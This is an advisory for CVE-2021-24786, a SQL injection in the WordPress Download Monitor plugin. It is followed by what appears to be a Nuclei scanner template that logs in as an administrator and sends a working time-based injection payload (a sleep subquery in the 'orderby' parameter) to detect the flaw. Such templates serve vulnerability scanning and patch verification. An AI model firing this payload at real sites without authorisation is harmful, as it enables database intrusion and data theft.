The Download Monitor plugin for WordPress is vulnerable to SQL injection via the 'orderby' parameter in versions before 4.4.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with administrator-level permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
PoC代码[已公开]
id: CVE-2021-24786
info:
name: Download Monitor < 4.4.5 - SQL Injection
author: MrHarsh
severity: high
description: |
The Download Monitor plugin for WordPress is vulnerable to SQL injection via the 'orderby' parameter in versions before 4.4.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with administrator-level permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
impact: |
Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion.
remediation: |
Update to version 4.4.5 or later.
reference:
- https://wpscan.com/vulnerability/a6571f16-66d2-449e-af83-1c6ddd56edfa
- https://plugins.trac.wordpress.org/changeset/2610899/download-monitor
- https://nvd.nist.gov/vuln/detail/CVE-2021-24786
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2021-24786
cwe-id: CWE-89
epss-score: 0.04418
epss-percentile: 0.88786
cpe: cpe:2.3:a:download_monitor_project:download_monitor:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: download_monitor_project
product: download_monitor
framework: wordpress
publicwww-query: "/wp-content/plugins/download-monitor/"
tags: cve,cve2021,wordpress,wp-plugin,sqli,download-monitor,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
@timeout: 30s
GET /wp-admin/edit.php?post_type=dlm_download&page=download-monitor-logs&orderby=download_date`+and+(select+sleep(8))+and+`user_id=user_id HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body_2, "dlm_product")'
- 'status_code_2 == 200'
- 'duration_2 >= 8'
condition: and
# digest: 4a0a00473045022100f09d03ec1f7c4237e814e9858d4927dc91b8a4c6adde172fe9bbd9e3faa0eaaa022012bb6e58c575636d117cdb6d59ab86b6e5569a82afd51708aa0ca405649d7c72:922c64590222798bb761d5b6d8e72950